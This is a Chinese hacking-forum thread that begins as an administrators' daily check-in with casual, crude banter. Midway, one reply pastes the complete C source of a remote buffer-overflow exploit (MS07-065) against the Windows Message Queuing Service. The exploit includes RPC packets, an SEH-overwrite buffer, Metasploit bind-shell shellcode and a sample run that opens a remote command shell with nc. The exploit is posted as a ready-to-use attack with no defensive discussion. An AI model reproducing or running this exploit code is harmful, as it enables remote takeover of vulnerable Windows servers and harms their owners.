最近看过此主题的会员

返回列表 发帖

12.14管理组签到

12.14管理组签到

 

您可能还想看的主题:

12.15管理组签到

非安全中国论坛管理制度

3389批量管理

非安全中国技术交流群管理暂行条例

管理组相关规定!

非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:webmaster发表,本帖发表者webmaster符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者webmaster和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

沙僧签到,
老大木JJ,
老大是淫贼。
1

评分人数

TOP

偶是楼主。
1

评分人数

TOP

抢签到。。。。
1

评分人数

TOP

完了,换了个浏览器

结果打字都困难
1

评分人数

TOP

常年打酱油的……
1

评分人数

用技术诠释我的人生!

TOP

这个可以试试吧~
1

评分人数

TOP

这个可以试试吧~
Cinbow 发表于 2010-12-14 21:58



    还行吧

TOP

回复 8# webmaster
每天都有钱挣了

TOP

哥我不缺钱。。缺的是寂寞啊。。。。:L

TOP

哈哈,
我缺的也不是钱,
我缺什么,我都不知道。
我只知道老大木JJ,
老大是淫贼。

TOP

来晚了 补上签到

TOP

来晚了 补上签到

TOP

ms07 - 065微软消息队列服务的RPC利用
/*Windows Message Queuing Service Remote RPC BOF Exploit (MS07-065)by axishttp://www.ph4nt0m.org  you should know the dnsname of target to trigger this vuln  the service runs on port 2103/2105/2107D:softdevelopMyProjects        empDebug>temp.exe -h 192.168.152.100 -p 2103---------------------------------------------------------------------------== Windows Message Queuing Service Remote RPC BOF Exploit (MS07-065) ==--== code by axis@ph4nt0m ==--== Http://www.ph4nt0m.org ==--== Tested against Windows 2000 server SP4 ==---------------------------------------------------------------------------[+] Attacking default port 2103
  • Sending our Payload, Good Luck! ^_^
  • Sending RPC Bind String!
  • Sending RPC Request Now!D:softdevelopMyProjects        empDebug>D:>nc -vv -n 192.168.152.100 1154(UNKNOWN) [192.168.152.100] 1154 (?) open: unknown socket errorMicrosoft Windows 2000 [Version 5.00.2195](C) 版权所有 1985-2000 Microsoft Corp.C:WINNTsystem32>exitexitsent 5, rcvd 109: NOTSOCKD:>*/#include <stdio.h>#include <stdlib.h>#include <ctype.h>#include <winsock.h>#include <io.h>#pragma comment(lib,"ws2_32")// RPC Bind UUID: fdb3a030-065f-11d1-bb9b-00a024ea5525 v1.0char bind_str[] = {0x05, 0x00, 0x0b, 0x03, 0x10, 0x00, 0x00, 0x00,0x48, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,0xd0, 0x16, 0xd0, 0x16, 0x00, 0x00, 0x00, 0x00,0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00,0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11,0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25,0x01, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a,0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00,0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00 };// RPC Request  Opnum: 0x06 char request_1[] = {0x05, 0x00, 0x00, 0x81, 0x10, 0x00, 0x00, 0x00,0xd0, 0x16, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,0x98, 0x17, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00,0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11,0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25,0x01, 0x00, 0x00, 0x00, 0xba, 0x0b, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0xba, 0x0b, 0x00, 0x00,0x61, 0x00, 0x2d, 0x00, 0x64, 0x00, 0x64, 0x00,  // target's dns name (unicode)0x61, 0x00, 0x34, 0x00, 0x31, 0x00, 0x33, 0x00,0x39, 0x00, 0x38, 0x00, 0x66, 0x00, 0x34, 0x00,0x34, 0x00, 0x66, 0x00, 0x34, 0x00, 0x2e, 0x00,0x66, 0x00, 0x75, 0x00, 0x63, 0x00, 0x6b, 0x00,0x5c, 0x00, 0x00, 0xcc, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0xeb, 0x06, 0x42, 0x42, 0x32, 0xb0,     // xebx06x42x42 jmpcode0x01, 0x78, 0x2b, 0xc9, 0x83, 0xe9, 0xb0, 0xd9,     //  overwrite seh ; call ebx0xee, 0xd9, 0x74, 0x24, 0xf4, 0x5b, 0x81, 0x73,     //  bindshell on port 1154, metasploit shellcode0x13, 0x1d, 0x82, 0x67, 0xb4, 0x83, 0xeb, 0xfc,0xe2, 0xf4, 0xe1, 0xe8, 0x8c, 0xf9, 0xf5, 0x7b,0x98, 0x4b, 0xe2, 0xe2, 0xec, 0xd8, 0x39, 0xa6,0xec, 0xf1, 0x21, 0x09, 0x1b, 0xb1, 0x65, 0x83,0x88, 0x3f, 0x52, 0x9a, 0xec, 0xeb, 0x3d, 0x83,0x8c, 0xfd, 0x96, 0xb6, 0xec, 0xb5, 0xf3, 0xb3,0xa7, 0x2d, 0xb1, 0x06, 0xa7, 0xc0, 0x1a, 0x43,0xad, 0xb9, 0x1c, 0x40, 0x8c, 0x40, 0x26, 0xd6,0x43, 0x9c, 0x68, 0x67, 0xec, 0xeb, 0x39, 0x83,0x8c, 0xd2, 0x96, 0x8e, 0x2c, 0x3f, 0x42, 0x9e,0x66, 0x5f, 0x1e, 0xae, 0xec, 0x3d, 0x71, 0xa6,0x7b, 0xd5, 0xde, 0xb3, 0xbc, 0xd0, 0x96, 0xc1,0x57, 0x3f, 0x5d, 0x8e, 0xec, 0xc4, 0x01, 0x2f,0xec, 0xf4, 0x15, 0xdc, 0x0f, 0x3a, 0x53, 0x8c,0x8b, 0xe4, 0xe2, 0x54, 0x01, 0xe7, 0x7b, 0xea,0x54, 0x86, 0x75, 0xf5, 0x14, 0x86, 0x42, 0xd6,0x98, 0x64, 0x75, 0x49, 0x8a, 0x48, 0x26, 0xd2,0x98, 0x62, 0x42, 0x0b, 0x82, 0xd2, 0x9c, 0x6f,0x6f, 0xb6, 0x48, 0xe8, 0x65, 0x4b, 0xcd, 0xea,0xbe, 0xbd, 0xe8, 0x2f, 0x30, 0x4b, 0xcb, 0xd1,0x34, 0xe7, 0x4e, 0xd1, 0x24, 0xe7, 0x5e, 0xd1,0x98, 0x64, 0x7b, 0xea, 0x63, 0x36, 0x7b, 0xd1,0xee, 0x55, 0x88, 0xea, 0xc3, 0xae, 0x6d, 0x45,0x30, 0x4b, 0xcb, 0xe8, 0x77, 0xe5, 0x48, 0x7d,0xb7, 0xdc, 0xb9, 0x2f, 0x49, 0x5d, 0x4a, 0x7d,0xb1, 0xe7, 0x48, 0x7d, 0xb7, 0xdc, 0xf8, 0xcb,0xe1, 0xfd, 0x4a, 0x7d, 0xb1, 0xe4, 0x49, 0xd6,0x32, 0x4b, 0xcd, 0x11, 0x0f, 0x53, 0x64, 0x44,0x1e, 0xe3, 0xe2, 0x54, 0x32, 0x4b, 0xcd, 0xe4,0x0d, 0xd0, 0x7b, 0xea, 0x04, 0xd9, 0x94, 0x67,0x0d, 0xe4, 0x44, 0xab, 0xab, 0x3d, 0xfa, 0xe8,0x23, 0x3d, 0xff, 0xb3, 0xa7, 0x47, 0xb7, 0x7c,0x25, 0x99, 0xe3, 0xc0, 0x4b, 0x27, 0x90, 0xf8,0x5f, 0x1f, 0xb6, 0x29, 0x0f, 0xc6, 0xe3, 0x31,0x71, 0x4b, 0x68, 0xc6, 0x98, 0x62, 0x46, 0xd5,0x35, 0xe5, 0x4c, 0xd3, 0x0d, 0xb5, 0x4c, 0xd3,0x32, 0xe5, 0xe2, 0x52, 0x0f, 0x19, 0xc4, 0x87,0xa9, 0xe7, 0xe2, 0x54, 0x0d, 0x4b, 0xe2, 0xb5,0x98, 0x64, 0x96, 0xd5, 0x9b, 0x37, 0xd9, 0xe6,0x98, 0x62, 0x4f, 0x7d, 0xb7, 0xdc, 0xf2, 0x4c,0x87, 0xd4, 0x4e, 0x7d, 0xb1, 0x4b, 0xcd, 0x82,0x67, 0xb4, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41};char request_2[] = {0x05, 0x00, 0x00, 0x82, 0x10, 0x00, 0x00, 0x00,0x18, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,0xf0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x00,0x30, 0xa0, 0xb3, 0xfd, 0x5f, 0x06, 0xd1, 0x11,0xbb, 0x9b, 0x00, 0xa0, 0x24, 0xea, 0x55, 0x25,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };void usage(char *argv) {   printf(" Usage:   %s -h 127.0.0.1 (Universal exploit)
    ",argv);   printf("          %s -h host [-p port]
    ",argv);   printf(" Targets:
    ");   exit(1);   }/************* TCP connect *************************/void Disconnect(SOCKET s);// ripped from isnoint Make_Connection(char *address,int port,int timeout){    struct sockaddr_in target;    SOCKET s;    int i;    DWORD bf;    fd_set wd;    struct timeval tv;    s = socket(AF_INET,SOCK_STREAM,0);    if(s<0)        return -1;    target.sin_family = AF_INET;    target.sin_addr.s_addr = inet_addr(address);    if(target.sin_addr.s_addr==0)    {        closesocket(s);        return -2;    }    target.sin_port = htons((short)port);    bf = 1;    ioctlsocket(s,FIONBIO,&amp;bf);    tv.tv_sec = timeout;    tv.tv_usec = 0;    FD_ZERO(&amp;wd);    FD_SET(s,&amp;wd);    connect(s,(struct sockaddr *)&amp;target,sizeof(target));    if((i=select(s+1,0,&amp;wd,0,&amp;tv))==(-1))    {        closesocket(s);        return -3;    }    if(i==0)    {        closesocket(s);        return -4;    }    i = sizeof(int);    getsockopt(s,SOL_SOCKET,SO_ERROR,(char *)&amp;bf,&amp;i);    if((bf!=0)||(i!=sizeof(int)))    {        closesocket(s);        return -5;    }    ioctlsocket(s,FIONBIO,&amp;bf);    return s;}void Disconnect(SOCKET s){         closesocket(s);         WSACleanup();}/****************************************************/int main(int argc, char * argv[]){   unsigned char * target = NULL;   int port = 2103;   int i;   int  ret;   char buffer[6000] = {0};   SOCKET  s;   WSADATA WSAData;   printf("--------------------------------------------------------------------------
    ");   printf("-== Windows Message Queuing Service RPC BOF Exploit (MS07-065) ==-
    ");   printf("-== code by axis@ph4nt0m ==-
    ");   printf("-== Http://www.ph4nt0m.org ==-
    ");   printf("-== Tested against Windows 2000 server SP4 ==-
    ");   printf("--------------------------------------------------------------------------

    ");    if (argc==1) usage(argv[0]); //Handle parameters     for(i=1;i<argc;i++) {      if ( (argv[0]=='-') ) {         switch (argv[1]) {         case 'h':            target=(unsigned char *)argv[i+1];            break;         case 'p':            if (strcmp(argv[i+1],"2103")==0) {               printf("[+] Attacking default port 2103
    ");            } else {               port=atoi(argv[i+1]);            }            break;                     default:            printf("[-] Invalid argument: %s
    ",argv);            usage(argv[0]);            break;         }         i++;                       } else usage(argv[0]);          }/********************** attack payload ***************************/                    if(WSAStartup (MAKEWORD(1,1), &amp;WSAData) != 0)                    {            fprintf(stderr, "[-] WSAStartup failed.
    ");            WSACleanup();            exit(1);                    }                    //Sleep(1200);         s = Make_Connection((char *)target, port, 10);         if(s<0)                    {            fprintf(stderr, "[-] connect err.
    ");            exit(1);                    }                   //Send our evil Payload                      printf("
  • Sending our Payload, Good Luck! ^_^
    ");                   printf("
  • Sending RPC Bind String!
    ");                   send(s, bind_str, sizeof(bind_str), 0);                   Sleep(1000);                                     printf("
  • Sending RPC Request Now!
    ");                   memset(buffer, 'x41', sizeof(buffer));  // fil the buffer to trigger seh    send(s, request_1, sizeof(request_1), 0);                   send(s, buffer, 5104, 0);   // fil the buffer to trigger seh                   send(s, request_2, sizeof(request_2), 0);                          Sleep(100);             memset(buffer, 0, sizeof(buffer));             ret = recv(s, buffer, sizeof(buffer)-1, 0);                   //printf("recv: %s
    ", buffer);                   Disconnect(s);                   return 0;}


















    公告:https://www.sitedirsec.com公布最新漏洞,请关注
  • TOP

    返回列表